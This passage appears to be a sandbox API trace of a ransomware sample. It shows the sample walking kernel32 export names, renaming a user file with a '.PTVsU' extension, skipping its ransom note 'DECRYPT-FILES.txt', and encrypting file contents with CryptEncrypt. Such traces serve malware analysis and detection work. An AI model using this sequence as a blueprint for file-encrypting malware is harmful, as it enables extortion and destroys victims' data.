lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.114] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.114] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.114] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.114] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.114] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.114] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.115] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.115] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.115] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.115] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.115] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.115] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.115] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.115] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.115] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.115] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.115] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.115] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.115] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.115] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.115] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.115] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.115] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.115] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.115] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.116] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.116] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.116] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.116] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.116] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.116] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.116] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.116] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.116] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.116] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.116] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.116] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.116] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.116] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.116] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.116] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.117] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png") returned 70 [0077.117] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png.PTVsU") returned 76 [0077.117] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\egrso1kcze_tcvnplfjt.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png.PTVsU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\egrso1kcze_tcvnplfjt.png.ptvsu"), dwFlags=0x0) returned 1 [0077.117] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.117] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.118] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.118] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4da76560, ftCreationTime.dwHighDateTime=0x1d4cb08, ftLastAccessTime.dwLowDateTime=0x7113d460, ftLastAccessTime.dwHighDateTime=0x1d4d301, ftLastWriteTime.dwLowDateTime=0x7113d460, ftLastWriteTime.dwHighDateTime=0x1d4d301, nFileSizeHigh=0x0, nFileSizeLow=0x1557, dwReserved0=0x0, dwReserved1=0x0, cFileName="ewVB7V5Jhjl32Wfh.m4a", cAlternateFileName="EWVB7V~1.M4A")) returned 1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="autorun.inf") returned 1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="boot.ini") returned 1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="desktop.ini") returned 1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="ntuser.dat") returned -1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="iconcache.db") returned -1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="bootsect.bak") returned 1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="ntuser.dat.log") returned -1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="thumbs.db") returned -1 [0077.118] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a", lpString2="Bootfont.bin") returned 1 [0077.118] lstrlenW (lpString="ewVB7V5Jhjl32Wfh.m4a") returned 20 [0077.118] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0077.118] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0077.118] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0077.118] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0077.118] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.118] lstrlenW (lpString="ewVB7V5Jhjl32Wfh.m4a") returned 20 [0077.118] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ewVB7V5Jhjl32Wfh.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a" [0077.119] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewvb7v5jhjl32wfh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.119] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=5463) returned 1 [0077.119] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.119] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.119] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.119] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.119] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.119] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.120] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.120] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.120] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.121] CloseHandle (hObject=0x444) returned 1 [0077.121] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.121] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.121] CloseHandle (hObject=0x0) returned 0 [0077.121] CloseHandle (hObject=0x440) returned 1 [0077.122] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.122] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.122] GetTickCount () returned 0x114bc9c [0077.122] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.129] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.129] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.129] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.129] lstrlenA (lpString="kernel32.dll") returned 12 [0077.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.130] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.130] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.130] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.130] lstrlenA (lpString="ADDATOMA") returned 8 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.130] lstrlenA (lpString="ADDATOMW") returned 8 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.130] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.130] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.130] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.130] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.130] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.130] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.130] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.130] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.130] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.130] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.130] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.130] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.131] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.131] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.131] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.131] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.131] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.131] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.131] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.131] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.131] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.131] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.131] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.131] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.131] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.131] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.131] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.131] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.131] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.131] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.131] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.132] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.132] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.132] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.132] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.132] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.132] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.132] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.132] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.132] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.132] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.132] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 